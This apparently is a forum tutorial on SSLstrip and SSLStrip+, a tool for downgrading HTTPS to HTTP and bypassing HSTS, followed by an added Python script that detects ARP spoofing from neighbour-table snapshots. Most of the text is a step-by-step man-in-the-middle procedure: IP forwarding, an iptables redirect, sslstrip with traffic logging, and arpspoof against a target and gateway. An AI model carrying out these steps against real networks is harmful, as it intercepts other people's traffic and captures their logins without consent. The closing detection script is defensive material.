SSLstrip (SSLStrip +)

Mutt

Good day, without further ado, straight to the point.

Description of SSLstrip
sslstrip is a tool that transparently hijacks HTTP traffic on the network, watches for HTTPS links and redirects, and then maps those links to look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for serving a favicon that looks like a lock icon, selective logging, and session denial.

Official site: http://www.thoughtcrime.org/software/sslstrip/

Description of SSLStrip +
This is a new version of SSLstrip with a new feature to bypass the HTTP Strict Transport Security (HSTS) protection mechanism.
Like the original, this version changes HTTPS to HTTP, and it additionally changes the hostname in the HTML code to avoid HSTS.
In order for it to work, it also needs a DNS server that reverses the changes made by the proxy. This DNS server is dns2proxy.
Page on GitHub: https://github.com/singe/sslstrip2/

How does SSLstrip work?
First, arpspoof convinces the host that our MAC address is the MAC address of the router, and the target starts sending us all its network traffic. The kernel forwards everything except traffic destined for port 80, which is redirected to $listenPort (10000, for example).

This is how sslstrip gets traffic and does its magic.

Installing SSLstrip
The program is preinstalled in Kali Linux.

Installing SSLstrip on Linux
Requirements:
  • Python >= 2.5 (apt-get install python)
  • Python module "twisted-web" (apt-get install python-twisted-web)

Installation:
Code:
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
# (optional)
sudo python ./setup.py install

SSLstrip launch examples
Write results to file (-w sslstrip.log), listen on port 8080 (-l 8080):
Code:
sslstrip -w sslstrip.log -l 8080

Running sslstrip
Switch your machine to forwarding mode:
Code:
echo "1" > /proc/sys/net/ipv4/ip_forward

Configure iptables to redirect HTTP traffic to sslstrip:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Run sslstrip:
Code:
sslstrip.py -l <listenPort>

Run arpspoof to convince the network that it should send its traffic to you:
Code:
arpspoof -i <interface> -t <targetIP> <gatewayIP>

SSLstrip Help
Usage: sslstrip <options>
Options:
-w <file_name>, --write=<file_name> Sets the file for the log (optional).
-p, --post Log SSL POST only. (default)
-s, --ssl Log all SSL traffic to and from the server.
-a, --all Log all SSL and HTTP traffic to and from the server.
-l <port>, --listen=<port> Listening port (default 10000).
-f, --favicon Change the site icon to a padlock for secure requests.
-k, --killsessions Kill current sessions.
-h Print this help message.
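
Added example (not part of the original post and not sslstrip code): the arpspoof step described under "How does SSLstrip work?" leaves a trace in the target's neighbour table, because the router's IP now resolves to another host's MAC. This Python check looks for that in `ip neigh` output; the snapshots, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample `ip neigh` snapshots (not captured from a real network).
BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev eth0 lladdr de:ad:be:ef:00:23 STALE
192.168.1.40 dev eth0 lladdr 52:54:00:aa:bb:cc REACHABLE
"""
AFTER = """\
192.168.1.1 dev eth0 lladdr de:ad:be:ef:00:23 REACHABLE
192.168.1.23 dev eth0 lladdr de:ad:be:ef:00:23 REACHABLE
192.168.1.40 dev eth0 lladdr 52:54:00:aa:bb:cc STALE
192.168.1.77 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.I)

def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m["ip"]] = m["mac"].lower()
    return table

def check_gateway(baseline, current, gateway_ip):
    """Compare the gateway's neighbour entry against a trusted baseline."""
    findings = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if new is None:
        return ["gateway %s has no resolved MAC" % gateway_ip]
    if old and new != old:
        findings.append("gateway %s MAC changed %s -> %s" % (gateway_ip, old, new))
    # Assumption: the spoofing host's own IP is usually in the table as well,
    # so one MAC answering for the gateway and another IP is a second signal.
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    sharing = sorted(ip for ip in by_mac[new] if ip != gateway_ip)
    if sharing:
        findings.append("gateway MAC %s also claimed by %s" % (new, ", ".join(sharing)))
    return findings

if __name__ == "__main__":
    for f in check_gateway(parse_neigh(BEFORE), parse_neigh(AFTER), "192.168.1.1"):
        print("ALERT:", f)
```

The baseline snapshot has to be taken while the network is known to be clean, for example right after the router's MAC has been verified out of band.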